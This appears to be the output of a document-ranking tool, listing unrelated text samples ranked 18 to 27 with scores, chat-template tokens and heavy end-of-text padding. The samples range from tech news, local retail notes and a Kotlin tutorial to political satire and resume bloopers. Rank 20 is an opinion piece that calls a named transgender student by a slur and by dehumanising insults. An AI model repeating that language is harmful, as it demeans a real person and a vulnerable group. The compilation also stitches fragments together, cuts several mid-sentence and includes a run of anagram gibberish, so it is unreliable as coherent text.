bit of information. Therefore, if you can pack them more densely together, you get more storage in the same space. + +By adding sodium chloride to the mix, it has been possible to get a single 10nm grain storing one bit. Replacing several 7nm grains with one 10nm saves a lot of space and therefore ups the storage density considerably. + +The good news is the use of sodium chloride can be added to existing lithography processes, suggesting it won’t take too long to get this up and running for commercial drives. So far a 1.9 Terabit/inch2 storage solution has been shown to work, but that will increase to 3.3 Terabit/inch2, and then further research and development is aiming to achieve 10 Terabit/inch2 in the future. + +For us as consumers, it means the hard drive still has quite a few years of storage bumps still to come, and a greater challenge for SSDs trying to catch up with the amount of storage on offer. This also bodes well for data centers who need to cater for a never-ending storage need as more cloud services go online. + +Read more at the IMRE press release (PDF), via Physorg<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 18; Score = 13893632.0 +<|begin_of_text|>Canadian Tire moving Clayton Park store to former Target in Bayers Lake. Canadian Tire also opened their new store in Elmsdale this week. + +I’m slow on the draw, this timebut the Burrito Jax in Clayton Park is open, just on the side of Sobeys. + +East Coast Lifestyle to open a Halifax storefront, location TBD + +The Home Hardware in Enfield is closed after 60 years + +In Costco Cafe news Smoked Meat Sandwiches going on Monday. Replacing with Chk Caesar Salad. Will sell meat till stock gone + +Urban Outfitters is having their Grand Opening on May 15, paper is off the windows and stocking the shelves is in progress. + +Tom’s Havana confirmed that they are indeed moving October 1, but new location not finalized yet. Sleep Country on Spring Garden is moving with BMO to the new building where Winsby’s used to be. + +Zions Gate, in Spryfield has open a liquidation centre at the back of South Centre Mall (by Bowlarama) + +Ottoman Cafe and Mid Point Coffee on Spring Garden are closing up shop and heading to Toronto. + +The Jessy’s Pizza in Kingswood is now open. + +The Holiday Inn Express, Kearney Lake is now Chateau Bedford<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 19; Score = 13893632.0 +<|begin_of_text|>Jeopardy! host Alex Trebek celebrated Canada Day with a category on the game show Friday about the country's sesquicentennial. + +"Canadians are highly respected, as you know, no matter where you travel in the world," Trebek, who is an official representative for the Canada 150 celebrations, told CBC News in Los Angeles. "Here, in California, you mention you're from Canada and people just look at you in a friendlier way." + +The popular game show, which Trebek has been hosting since 1984, showcased a series of clues that most Canadians would have had little trouble getting right. They ranged from correctly identifying the Quebec flag to naming the national anthem. + +"We weren't really making it too difficult on Americans," the Jeopardy! host joked. + +The Canada 150 category on Jeopardy! included clues about the national anthem and the Quebec flag. (Jeopardy!) + +The Sudbury, Ont., native, 76, was also honoured with the Order of Canada Friday, along with other famous faces including Mike Myers and Catherine O'Hara. + +"You could have received it in any year and it would have been something special for you and your family," said Trebek. "But to have it in conjunction with Canada's 150th birthday, it just says they gave this a great deal of thought and that makes me feel very proud." + +The Canadian-born Jeopardy! host explains his elation at receiving the award during the country's 150th birthday 0:59 + +Trebek, who began his career at the CBC in 1962 and has become synonymous with the television quiz program for the last 33 years, opened Friday's show sporting a Canada 150 jersey. + +Before the credits rolled, he said, "we're partying for the next four days, folks," referring to both Canada Day and American Fourth of July festivities.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 20; Score = 13697024.0 +<|begin_of_text|>Where transgenders decide to sprinkle their tinkle is NOBODY’S BUSINESS! Except it’s everyone’s business. Including that of white-knightly tech giants like Apple and Ebay. You may recall not long ago Trump reversed Obama’s decision which forced states to allow trannies into certain bathrooms. Our current President didn’t outlaw those transgender bathroom privileges, but simply restored the states’ power to discern for themselves. Therein lies the outrage. + +Apple and other companies have decided to take a stand… By getting involved in a lawsuit filed by a trans student suing his school for boys’ bathroom privileges. + +Something to note here? People were uncomfortable sharing the restroom with Gavin Grimm, the girl-boy, so the school provided a unisex restroom to him in an attempt to make everyone happy. The boys wouldn’t have to bare themselves before a lady-man, and the trans student wouldn’t have to share a restroom with girls. But it wasn’t enough for the amorphous slug. Of course. + +Now he’s demanding access to the boys’ rooms via lawsuit. Entitled little toad. This is the case that Apple and friends are jumping in to support… + +A number of leading tech firms plan to file a brief in favor of transgender rights in a case due to be heard next month in the Supreme Court. Apple has been among those leading the charge on the effort, along with… Affirm, Box, Ebay, GitHub, IBM, Microsoft, PayPal, Salesforce, Slack, Tumblr, Yelp. Apple has already spoken out on the Trump Administration’s move to pull back on Obama-era guidance that interpreted existing law to require schools to let students use the restroom that matches their gender identity. The Supreme Court case, involving Virginia high school student Gavin Grimm, asks the court to weigh in on the same question. + +These companies really, really care about rights. Just not the rights of the states. Or those who want to potty in peace. It seems as though Apple misses not a single opportunity to get hyper-political (see Apple Goes Full PC, Replaces ‘Offensive’ Gun Emoji With Squirt Gun… and Far-Left Apple CEO to Wage War on Fake News. Misses HUGE Irony…). We’re finding that tech companies are becoming more and more politically involved. Why stick with creating better tech products when you can wade into potty politics? Maybe there’s an app for that. + +Look, this is America, where businesses can say and do what they please. The problem here? These companies are alienating a large portion of their +================================================================================ +Rank = 21; Score = 13434880.0 +<|begin_of_text|>Old Glory is almost certainly the most honored flag in the world. + +The late political scientist Samuel Huntington marveled at its place in our national life: We pledge allegiance to it. The national anthem celebrates it. An incredibly elaborate code stipulates how it’s displayed, handled and maintained. It even has its own holiday. + +“Since the Civil War,” Huntington wrote, “Americans have been a flag-oriented people. The Stars and Stripes has the status of a religious icon and is a more central symbol of national identity for Americans than their flags are for peoples of other nations.” + +The NFL players who kneel during the national anthem — a phenomenon that increased exponentially after President Trump colorfully demanded they stand — are disrespecting the most potent and enduring national symbol of the most patriotic nation on Earth. + +Not only are they wrong to do so, they aren’t delivering the devastating rebuke to Trump they may imagine. + +The power of national — or imperial — symbols isn’t new. The Romans couldn’t abide the collective disgrace of losing their standards to the enemy in battle, and would undertake decades-long campaigns to win them back. + +The American flag is layered with history and meaning. As Tim Marshall recounts in his book, “A Flag Worth Dying For,” its roots probably reach back prior to the country’s independence. It may owe its red and white stripes to the flag of the Sons of Liberty, the revolutionary agitators who carried out the Boston Tea Party. + +The “rebellious stripes” of that flag, lacking a field of stars, don’t look like much. In 1777, the Continental Congress added the stars. + +The flag took time to catch on. The Civil War, which tested the integrity of the flag, represented a watershed. It came to be known as Old Glory at this time, courtesy of a cussed merchant seaman named William Driver, who demonstrated a characteristic American attitude to the Stars and Stripes. + +Driver had retired to Nashville, Tenn., with his flag still in his possession. When local Confederates demanded he hand it over, he replied that they were welcome to take it — over his dead body. Secreted in a bed quilt, the flag was eventually handed over to Union forces, and the legend of Old Glory spread. + +After the war, Union veterans advocated for the display of the flag and for its veneration. The National Flag Conference of 1923 — yes, there was a national flag conference — set out the code subsequently adopted by Congress. + +Per the code, “the flag represents a living country and is +================================================================================ +Rank = 22; Score = 12976128.0 +<|begin_of_text|>News that MPs will get the chance to vote on the final Brexit deal has been welcomed by Labour who plan to use the opportunity to continue doing f**k all about Britain leaving the EU. + +Leader Jeremy Corbyn immediately responded warmly to the announcement + +“This vote is a victory for democracy and for the people of this country,” he said. + +“And rest assured we will use it to continue our long-standing policy of doing f**k all about Brexit.” + +Labour have been committed to doing f**k all about Britain leaving the EU since the referendum was announced by David Cameron, whoever he is, some eighteen months ago. + +Immediately after the referendum announcement, Jeremy Corbyn swung into action by doing f**k all. + +When campaigning started in earnest Labour remained constant in doing f**k all. + +Not wishing to let the momentum drop, at the height of the campaign Shadow Chancellor John McDonnell did f**k all. + +Finally, when the referendum result was announced, Jeremy Corbyn did his best to rally shellshocked remainers by doing f**k all. + +Every day since, Labour has remained proudly committed to doing f**k all about Brexit and, with this new announcement, look set to continue doing f**k all until the country is completely isolated and vilified, and is ultimately reduced to being little more than a nice place for Donald Trump to park his helicopter.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 23; Score = 12910592.0 +<|begin_of_text|>The elderly father of Metallica’s late bassist is making sure that his son’s positive legacy does not just fade to black. + +Cliff Burton, who was one of the founding members of Metallica, played bass guitar on the metal band’s first three albums until he was killed in a tour bus accident in 1986. + +The royalties from these albums have been going to Cliff’s 92-year-old father Ray—and the senior has only now revealed what he’s been spending that money on. + +CHECK OUT: Metallica Replaces Stolen Equipment of Tribute Band + +Ray has been donating all of the Metallica royalties towards musical scholarships for Castro Valley High School students in the San Francisco Bay area of California. + +The school has sentimental value to Ray since it was the school which Cliff attended when he was younger. + +“The kids who won it, they invariably write and thank me,” Ray told the Alphabettica podcast host last month. “And I think Cliff probably would have done that with his money, because he was not against education by any means. He liked it very much.” + +The Bell Tolls For You To Send This Story To Your Friends: Click To Share<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 24; Score = 12910592.0 +<|begin_of_text|>Team Android at Basecamp recently passed a fairly big milestone — over 25% of the Basecamp 3 Android app code base now runs on Kotlin! 🎉 + +We’ve found that Kotlin not only makes our code much better, but massively increases programmer happiness. All of this ensures we’re making the best app we can for the tens of thousands of Android users we support. + +Given our new experiences with the language, I thought it’d be worth sharing some specifics that make the language so wonderful to work with. + +Unlike most articles that introduce you to a language, I’m going to avoid using too much programming lingo. Instead, I’ll try using plain English in the hopes that it’s more accessible to beginners. 🤗 + +Some notes about the code examples: + +I am by no stretch an expert in Kotlin. Read, consider, and discuss! + +They look better on a desktop browser. You can get by on the mobile app in landscape mode, but I’d recommend breaking out your laptop to read them. + +You can get by on the mobile app in landscape mode, but I’d recommend breaking out your laptop to read them. They’re brief and simple on purpose. Long-winded examples tend to cause confusion. Take these simple examples and extrapolate them into your own potential uses, and you’ll see a lot more power. + +Let’s get started with seven of my current favorites! + +1. Replacing simple if/else if/else blocks with when + +One of my absolute favorites. + +// Java + +if (firstName.equals("Dan")) { + +person.setTeam(programmers); + +} else if (lastName.equals("Dihiansan")) { + +person.setTeam(designers); + +} else { + +person.setTeam(others); + +} + +// Kotlin + +when { + +firstName == "Dan" -> person.team = programmers + +lastName == "Dihiansan" -> person.team = designers + +else -> person.team = others + +} + +when blocks are effectively the same as a simple if block, but look how much more readable that is! + +There’s a similar convention when only one argument is being checked. Typically this would be a long, ugly switch/case statement in Java. + +// Java + +switch (firstName) { + +case "Dan": person.setTeam(programmers) + +break; + +case "Jay": person.setTeam(programmers) + +break; + +case "Jamie": person.setTeam(designers) + +break; + +default: + +person.setTeam(others) + +} + +// Kotlin + +when (firstName) { + +"Dan", "Jay" -> person.team = programmers + +"Jamie +================================================================================ +Rank = 25; Score = 12910592.0 +<|begin_of_text|>What is feminism? In this exclusive extract from A Book For Her, the standup comedian tells you everything you need to know about the movement that is the sole cause of the recession, global warming, terrorism, pandemics, cancelled flights, volcanos, delayed trains and pedantic health and safety regulations + +Facebook Twitter Pinterest Bridget Christie: ‘I even hate Ban Ki-moon.’ Photograph: David Levene/Guardian + +I am a feminist. All this means is that I am extremely hairy and hate all men, both as individuals and collectively, with no exceptions. Nope. Not even Laurence Llewelyn-Bowen/Paul Hollywood/Ronnie Corbett/Trevor McDonald/David Attenborough or John Nettles circa Bergerac are good enough for me. + +I even hate Ban Ki-moon. It’s one thing to try to eradicate female genital mutilation and forced marriage, but Mrs Ban Ki-moon told me she can’t remember the last time her husband put the Hoover round. Or sprayed his own soiled pants with pre-wash Vanish. Feminism begins at home, Mr Ban, not at the UN. Huh! Ban Ki-hypocrite, more like. + +Feminists don’t like humour, except slapstick. Charlie Chaplin, Harold Lloyd, Laurel and Hardy and Bottom are all very popular at feminist comedy nights. Anything that involves men being physically harmed always goes down very well with feminists. They also enjoy watching Tom and Jerry, Road Runner cartoons and war documentaries. + +Feminists never have sex and hate men opening doors for them, even into other dimensions. + +Christmas is banned in the “feminist community”, along with birthdays, wallpaper, nuance, giving people the benefit of the doubt and all music. Feminists only ever listen to one song, on a loop: kd lang’s Constant Craving. + +All feminists are lesbians. There is not a single heterosexual woman in the world who believes that women should have equal rights. Not one. If a feminist says she is heterosexual or bisexual or asexual, she is lying. They are all lesbians. + +Feminism is the sole cause of the recession, global warming, terrorism, pandemics, cancelled flights, volcanos, delayed trains and overly pedantic health and safety regulations. You can’t have hot drinks at work now because of feminism, or climb up small stepladders in libraries. You can’t eat a lobster without safety goggles now because of feminists. You can’t even open a door now because of +================================================================================ +Rank = 26; Score = 12648448.0 +<|begin_of_text|>Thought of the Moment + +Death must be so beautiful. To lie in the soft brown earth, with the grasses waving above one's head, and listen to silence. To have no yesterday, and no tomorrow. To forget time, to forgive life, to be at peace. -Oscar Wilde, writer (1854-1900) + +. It's free. Death must be so beautiful. To lie in the soft brown earth, with the grasses waving above one's head, and listen to silence. To have no yesterday, and no tomorrow. To forget time, to forgive life, to be at peace. -Oscar Wilde, writer (1854-1900) Receive quotations (and words) in our daily newsletter. It's free. + +Satanic SkyCatkins SayCatkin SaysAntics YaksCask SanityCask SatinySack SanitySack SatinyYacks SatinYacks SaintYacks AntisYacks StainYack SaintsYack StainsYack SatinsScanty SakiA Antics SkyA Sacks TinyA Casks TinyA Stacks YinA Tacks YinsA Stack YinsA Yacks NitsA Yacks SnitA Yacks TinsA Tacky SinsA Yack SnitsA Scanty SkiA Cyans SkitA Cyans KitsA Cyan SkitsA Sac StinkyA Scats InkyA Casts InkyA Cays StinkA Cays KnitsA Cay StinksA Akin CystsA Yanks TicsA Snaky TicsA San StickyA Nasty SickA Tansy SickA Antsy SickA Nays TicksA Nays StickA Nay SticksA Any SticksA Stays NickA Stay NicksSancta I SkyAntic As SkySnack Stay ISnack Say TiSnack Say ItSnack Ay SitSnack Ay ItsSnack Ay TisSnack Ya SitSnack Ya ItsSnack Ya TisSnacks Ay TiSnacks Ay ItSnacks Ya TiSnacks Ya ItCask Ani StyCask Nasty ICask Tansy ICask Antsy ICask Nays TiCask Nays ItCask Nay SitCask Nay ItsCask Nay TisCask Any SitCask Any ItsCask Any TisCask As TinyCask Sat YinCask Stay InCask Say NitCask Say TinCask At YinsCask Ay NitsC +================================================================================ +Rank = 27; Score = 12320768.0 +<|begin_of_text|>None of this is made up. People really did put this stupid crazy shit on their resumes or job applications. + +1. I am very detail-oreinted. + +2. My intensity and focus are at inordinately high levels, and my ability to complete projects on time is unspeakable. + +3. Thank you for your consideration. Hope to hear from you shorty! + +4. Enclosed is a ruff draft of my resume. + +5. It’s best for employers that I not work with people. + +6. Here are my qualifications for you to overlook. + +7. I am a quick leaner, dependable, and motivated. + +8. If this resume doesn’t blow your hat off, then please return it in the enclosed envelope. + +9. My fortune cookie said, “Your next interview will result in a job.” And I like your company in particular. + +10. I saw your ad on the information highway, and I came to a screeching halt. + +11. Insufficient writing skills, thought processes have slowed down some. If I am not one of the best, I will look for another opportunity. + +12. Please disregard the attached resume-it is terribly out of date. + +13. Seek challenges that test my mind and body, since the two are usually inseparable. + +14. Graduated in the top 66% of my class. + +15. Reason for leaving last job: The owner gave new meaning to the word paranoia. I prefer to elaborate privately. + +16. Previous experience: Self-employed-a fiasco. + +17. Exposure to German for two years, but many words are inappropriate for business. + +18. Experience: Watered, groomed, and fed the family dog for years. + +19. I am a rabid typist. + +20. I have a bachelorette degree in computers. + +21. Excellent memory; strong math aptitude; excellent memory; effective management skills; and very good at math. + +22. Strengths: Ability to meet deadlines while maintaining composer. + +23. I worked as a Corporate Lesion. + +24. Reason for leaving last job: Pushed aside so the vice president’s girlfriend could steal my job. 